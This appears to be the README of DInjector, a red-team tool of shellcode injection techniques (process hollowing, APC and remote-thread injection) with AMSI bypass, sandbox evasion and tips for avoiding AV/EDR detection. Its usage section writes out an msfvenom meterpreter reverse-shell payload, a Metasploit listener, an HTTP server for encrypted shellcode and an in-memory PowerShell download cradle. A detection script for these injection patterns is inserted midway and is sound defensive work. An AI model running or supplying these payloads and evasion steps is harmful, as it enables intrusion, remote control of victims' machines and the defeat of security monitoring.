DInjector: Collection of shellcode injection techniques
- Fully ported to D/Invoke API.
- Encrypted payloads which can be invoked from a URL or passed in base64 as an argument.
- Built-in AMSI bypass based on @rasta-mouse's method.
- Sandbox detection & evasion.
ℹ️ Based on my testing, the DInvoke NuGet package itself is being flagged by many commercial AV/EDR solutions when included as an embedded resource via Costura.Fody (or similar approaches), so I’ve shrunk it a bit and included it from source to achieve better OpSec.
- FunctionPointer: Allocates an RWX memory region, copies the shellcode into it, and executes it like a function.
- FunctionPointerV2: Sets RWX on a byte array and executes it like a function.
- CurrentThread: Injects shellcode into the current process. Thread execution via NtCreateThreadEx.
- RemoteThread: Injects shellcode into an existing remote process. Thread execution via NtCreateThreadEx.
- RemoteThreadSuspended: Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx.
- RemoteThreadAPC: Injects shellcode into a newly spawned remote process. Thread execution via NtQueueApcThread.
- RemoteThreadContext: Injects shellcode into a newly spawned remote process. Thread execution via SetThreadContext.
- ProcessHollow: Injects shellcode into a newly spawned remote process. Thread execution via NtResumeThread (hollowing with shellcode).
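From the defender's side, the memory-protection and thread-creation sequences in the list above leave an ordered trail that can be matched in telemetry. The following is an added detection example, not part of DInjector; the event schema (`ts`, `op`, `src_pid`, `dst_pid`, `addr`, `prot`), the rule names and the sample events are assumptions constructed for illustration.

```python
# Added example: flags the memory-protection sequences described in the list above.
# The event schema and rule names are hypothetical; map them onto whatever
# your EDR or ETW pipeline actually emits.
PAGE_NOACCESS = 0x01
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40

def ev(ts, op, src_pid, dst_pid, addr, prot=None):
    """Build one telemetry record (hypothetical schema)."""
    return {"ts": ts, "op": op, "src_pid": src_pid,
            "dst_pid": dst_pid, "addr": addr, "prot": prot}

def detect(events):
    """Return a sorted list of (rule, dst_pid, addr) findings."""
    findings = set()
    state = {}  # (dst_pid, addr) -> progress of a cross-process written region
    for e in sorted(events, key=lambda x: x["ts"]):
        key = (e["dst_pid"], e["addr"])
        remote = e["src_pid"] != e["dst_pid"]
        # RWX memory, as used by FunctionPointer / FunctionPointerV2.
        if e["op"] in ("alloc", "protect") and e["prot"] == PAGE_EXECUTE_READWRITE:
            findings.add(("rwx_region", *key))
        if e["op"] == "write" and remote:
            state[key] = "written"
        elif e["op"] == "protect" and key in state:
            # RemoteThreadSuspended: NOACCESS first, EXECUTE_READ later.
            if e["prot"] == PAGE_NOACCESS:
                state[key] = "hidden"
            elif e["prot"] == PAGE_EXECUTE_READ and state[key] == "hidden":
                state[key] = "flipped"
                findings.add(("noaccess_to_exec_flip", *key))
        elif e["op"] == "thread" and remote and key in state:
            # Thread started by another process inside memory it wrote.
            findings.add(("remote_thread_in_written_region", *key))
    return sorted(findings)

# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    ev(1, "protect", 4100, 4100, 0x1A0000, PAGE_EXECUTE_READWRITE),
    ev(2, "alloc",   5200, 6300, 0x2B0000, PAGE_READWRITE),
    ev(3, "write",   5200, 6300, 0x2B0000),
    ev(4, "protect", 5200, 6300, 0x2B0000, PAGE_NOACCESS),
    ev(5, "protect", 5200, 6300, 0x2B0000, PAGE_EXECUTE_READ),
    ev(6, "thread",  5200, 6300, 0x2B0000),
    # Benign-looking local activity: must not produce findings.
    ev(7, "protect", 7000, 7000, 0x3C0000, PAGE_EXECUTE_READ),
    ev(8, "thread",  7000, 7000, 0x3C0000),
]

if __name__ == "__main__":
    for rule, pid, addr in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} addr={addr:#x}")
```

The rules key on ordering within one target region, so the sleep between the two protection changes does not hide the sequence as long as events are retained long enough to correlate.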
~$ git clone https://github.com/snovvcrash/DInjector.git
- Compile the project in VS.
- Generate shellcode for your favourite C2:
~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin
- Encrypt the shellcode:
~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc
- Serve the encrypted shellcode and prepare C2 listener:
~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run"
- Use the PowerShell download cradle to load DInjector.dll as System.Reflection.Assembly and execute it from memory.
Required global arguments:
| Argument | Value | Description |
|---|---|---|
| /am51 | true, false | Applies AMSI bypass |
| /sc | http://10.10.13.37/enc | Sets shellcode path (can be loaded from URL or as a Base64 string) |
| /password | Passw0rd! | Sets password to decrypt the shellcode |
Copyright (c) 2021, snovvcrash
All rights reserved.